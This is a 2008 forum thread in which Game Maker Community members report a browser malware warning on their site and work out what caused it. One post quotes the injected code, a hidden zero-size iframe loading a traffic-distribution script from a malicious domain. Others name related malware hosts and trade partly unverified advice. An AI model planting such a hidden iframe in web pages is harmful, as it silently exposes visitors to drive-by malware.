Malware Alert, Malware warning when visiting gmc.yoyogames.com |
This forum is meant for discussions about this community. Make sure that you READ these rules prior to posting. Also, the General GMC Rules apply here too.
![]() ![]() |
Malware Alert, Malware warning when visiting gmc.yoyogames.com |
Sep 7 2008, 12:11 PM
Post
#1
|
|
|
RoketGames Admin Group: GMC Member Posts: 1855 Joined: 8-December 04 From: Roket Enterprises Member No.: 17533 |
While browsing the GMC in Google Chrome, I suddenly got a malware warning from my browser. You'll only see this notice in Google Chrome, but I've checked with other people on my IM list, and they are receiving the same notice.
UPDATE: Christian Sciberras has found the location of the "hack". QUOTE (Update) <a href="http://www.yoyogames.com/make">Game Maker Home <iframe src="http://yourtraff.biz/tds/in.cgi?20" width="0" height="0" style="display:none"></iframe></a> UPDATE 2: Firefox does show the warning, except they show it in the IFrame, whereas Google Chrome shows it over the entire site rendering, so it's only picked up in Google Chrome. UPDATE 3: If you are using Internet Explorer, then you are vunerable to this attack. Either use another browser, or add yourtraff.biz to your block list, like displayed. In either case, run a virus/malware scan straight away.
This post has been edited by Hach-Que: Sep 7 2008, 12:23 PM |
|
|
|
Sep 7 2008, 12:13 PM
Post
#2
|
|
|
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
The hack is there on all browsers.
I was just browsing this, so I say the site got hacked in the last 5 minutes or so (1:10PM). IMPORTANT: I suggest the forums are shutdown temporally. This post has been edited by uuf6429: Sep 7 2008, 12:14 PM |
|
|
|
Sep 7 2008, 12:15 PM
Post
#3
|
|
|
RoketGames Admin Group: GMC Member Posts: 1855 Joined: 8-December 04 From: Roket Enterprises Member No.: 17533 |
I'm quite well aware of this; the warning is only visible in Google Chrome though.
|
|
|
|
Sep 7 2008, 12:18 PM
Post
#4
|
|
|
I'm Looney for da Lunar! Group: GMC Member Posts: 1270 Joined: 29-May 07 From: USA Member No.: 79823 |
I thought they couldn't even use Iframe tags on IBM fourms? Can't the Admins just disable Iframes?
|
|
|
|
Sep 7 2008, 12:19 PM
Post
#5
|
|
|
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
It was not created by any user.
The iframe is embedded inside the forum code. This post has been edited by uuf6429: Sep 7 2008, 12:19 PM |
|
|
|
Sep 7 2008, 12:19 PM
Post
#6
|
|
|
GMC Member Group: GMC Member Posts: 152 Joined: 5-August 08 Member No.: 112253 |
I got it. Luckily my firewall and antivirus stopped it. It comes up telling me, and saying jar cache... then a certain number??? It seems like the gmc is under attack
EDIT: It says loading from yourtraff.biz at the bottom? and augreat.mine.nu This post has been edited by osl: Sep 7 2008, 12:41 PM |
|
|
|
Sep 7 2008, 12:24 PM
Post
#7
|
|
|
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
Now, now don't go on inventing theories.
This is surely a small scale attack otherwise we would have ended up with no forum till the next day, by which time we would learn that it's practically weaped out. Edit: It seems to have been fixed. Edit: No it's back :S This post has been edited by uuf6429: Sep 7 2008, 12:27 PM |
|
|
|
Sep 7 2008, 12:27 PM
Post
#8
|
|
|
GMC Member Group: GMC Member Posts: 152 Joined: 5-August 08 Member No.: 112253 |
Now, now don't go on inventing theories. This is surely a small scale attack otherwise we would have ended up with no forum till the next day, by which time we would learn that it's practically weaped out. Its not a theory. Try refreshing the main page and then look at the bar just above the windows star bar. Then it does say downloading from sites other than the ones I'm on Edit: It isn't fixed on mine This post has been edited by osl: Sep 7 2008, 12:28 PM |
|
|
|
Sep 7 2008, 12:29 PM
Post
#9
|
|
|
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
Hehe why do you think it's malware?
It's got to download something to actually attack your computer. Fortunately, my good ol' software does a good job keeping out the bad sh*t. |
|
|
|
Sep 7 2008, 12:37 PM
Post
#10
|
|
|
GMC Member Group: GMC Member Posts: 274 Joined: 20-January 04 From: Hobbitland Member No.: 4964 |
God damn you beat me to it, I was going to create a topic about this
Well I'll include a screen shot anyway for good measure. ![]() EDIT: If you are using Internet Explorer, then you are vunerable to this attack. Either use another browser, or add yourtraff.biz to your block list, like displayed. In either case, run a virus/malware scan straight away. Wrong. The only correct advice is: If you are using Internet Explorer: Use another browser. This post has been edited by spacerat: Sep 7 2008, 12:42 PM |
|
|
|
Sep 7 2008, 12:39 PM
Post
#11
|
|
|
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
WARNING!!
Everybody leave this forum now!! I just analayzed their code, and it seems that just by letting this thing running (without an on-access scanner like Avast's) it will grab pages containing info from google services including: Gmail GAnalytics Orkut This post has been edited by uuf6429: Sep 7 2008, 12:41 PM |
|
|
|
Sep 7 2008, 12:41 PM
Post
#12
|
|
|
I am stupid Group: GMC Member Posts: 2116 Joined: 27-October 03 From: Finland Member No.: 707 |
Is it just me or do I recall this happening many times before?
|
|
|
|
Sep 7 2008, 12:43 PM
Post
#13
|
|
|
GMC Member Group: GMC Member Posts: 274 Joined: 20-January 04 From: Hobbitland Member No.: 4964 |
WARNING!! Everybody leave this forum now!! I just analayzed their code, and it seems that just by letting this thing running (without an on-access scanner like Avast's) it will grab pages containing info from google services including: Gmail GAnalytics Orkut Can you prove this? |
|
|
|
Sep 7 2008, 12:44 PM
Post
#14
|
|
|
GMC Member Group: GMC Member Posts: 716 Joined: 1-November 07 From: ~~~~~~~~~~~~~~~ Cool: Yes Member No.: 92008 |
It just happened today.
I was browsing GMC yesterday and it didn't happen. EDIT: the site is rivatos.net, now. This post has been edited by Un_t0uch: Sep 7 2008, 12:49 PM |
|
|
|
Sep 7 2008, 12:52 PM
Post
#15
|
|
|
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
QUOTE Is it just me or do I recall this happening many times before? There's been other attempts, but shouldn't each new hack be fixed?The point is, with this they can do anything on the forum at the moment. Most browsers follow iframes blindly. Only an antivirus can stop them. Unless it's a special browser like Chrome. QUOTE Can you prove this? Try downloading their code. Then using some common sense (and knowldge of javascript), decode the existing obfuscated javascript into normal javascript. Keep doing this for all new links (of course DO NOT browse the links with your browser).Finally, you may follow up to pages which show your gmail messages (for example). Edit: @Un_t0uch: The main site is "yourtraff.biz" but it keeps making new iframes to other sites like the one you mentioned. There is one tiny hole: the iframe. Through it, any other site affiliated/related to "yourtraff.biz" can add their own code. What triggered this notice is the virus on "rivatos.net". But as said, the hole is elsewhere. This post has been edited by uuf6429: Sep 7 2008, 12:55 PM |
|
|
|
Sep 7 2008, 12:52 PM
Post
#16
|
|
|
GMC Member Group: GMC Member Posts: 502 Joined: 13-April 07 From: North East England Member No.: 76225 |
It's stopped showing the message for me in Chrome
|
|
|
|
Sep 7 2008, 12:54 PM
Post
#17
|
|
|
GMC Member Group: GMC Member Posts: 1184 Joined: 25-March 07 Member No.: 74405 |
![]() I see this too.. This proves that we can't live without an antivirus because some idiots think they're smart and edit the page. I hate them all. |
|
|
|
Sep 7 2008, 12:57 PM
Post
#18
|
|
|
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
AS I SAID if that site "rivatos.net" is removed, you won't see the virus warning anymore BUT the security hole is still there.
|
|
|
|
Sep 7 2008, 12:59 PM
Post
#19
|
|
|
GMC Member Group: GMC Member Posts: 152 Joined: 5-August 08 Member No.: 112253 |
It is still in Internet explorer, but it seems like it is from a variety of sites. rivatos.net, augreat.mine.nu and yourtraff.biz seem as if they are behind it. And anytime I upload one of these pages... multiple trojans appear
QUOTE AS I SAID if that site "rivatos.net" is removed, you won't see the virus warning anymore BUT the security hole is still there. I still get it... even though I've removed rivatos.net. I advise everyone to block augreat.mine.nu too This post has been edited by osl: Sep 7 2008, 01:05 PM |
|
|
|
Sep 7 2008, 01:05 PM
Post
#20
|
|
|
GMC Member Group: GMC Member Posts: 569 Joined: 10-June 06 From: â–ºFlanders, Belgium Member No.: 52068 |
Damn, I just wanted to make a topic about it
|
|
|
|
![]() ![]() |
|
Lo-Fi Version | Time is now: 22nd November 2009 - 12:45 AM |